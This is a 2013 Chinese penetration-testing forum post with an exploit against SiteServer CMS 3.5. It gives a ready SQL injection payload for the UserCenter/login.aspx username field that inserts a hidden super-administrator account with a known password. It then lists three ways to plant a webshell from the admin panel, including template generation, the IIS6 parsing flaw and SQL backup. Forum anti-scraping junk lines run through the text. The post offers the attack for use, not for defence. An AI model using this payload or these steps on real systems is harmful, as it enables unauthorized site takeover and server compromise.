中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
$ E' g+ Z( U8 x5 A/ O: k
stieserver官网:
www.siteserver.cn
0 b1 f' @4 x0 S: T% D
EXP:
* D+ y0 \5 \; T) i* f) z* |
直接访问UserCenter/login.aspx
/ ?, O2 g; t/ C# Q$ {& i2 m
用户名处输入:
% H* S4 k. O: Z7 P5 `8 g0 X2 `
5 j6 U# V2 g; r8 J) D
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
5 b8 V7 P Y6 ^2 j! ?8 x" W
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
# W6 X% n" Y2 `( n7 m4 I
之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 n3 c1 G) i9 M, M% [% a6 M
后台拿webshell的三种方法:
o1 k, o7 m% p4 ~ h- E) J9 y, D
一、
) B+ E: C5 f: z1 e- e
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
R2 p4 G. Z1 D+ k c' T4 N
二、
9 K2 Z7 T! A. m
成员权限-》添加用户-》用户名为:1.asp
% w7 q6 s# x& B9 |$ v( y
http://127.0.0.1/usercenter/
0 w1 t" ]" b x, m, D- d( K# p
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 T: M! @+ t; x% A& @
(ps:后台添加用户时不会验证是否含有非法字符)
( A7 w; z3 }+ F$ h' J f
三、
* T- D8 C+ R% E( h$ H% V& e
系统工具-》实用工具-》机器参数查看
, G5 J V# h2 A, ]* [3 @0 M0 s
可以看到数据库类型、名称,WEB路径
' U2 k9 S/ W3 ?6 `
系统工具-》数据库工具-》SQL语句查询
* x' c7 f4 p& ?- E
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2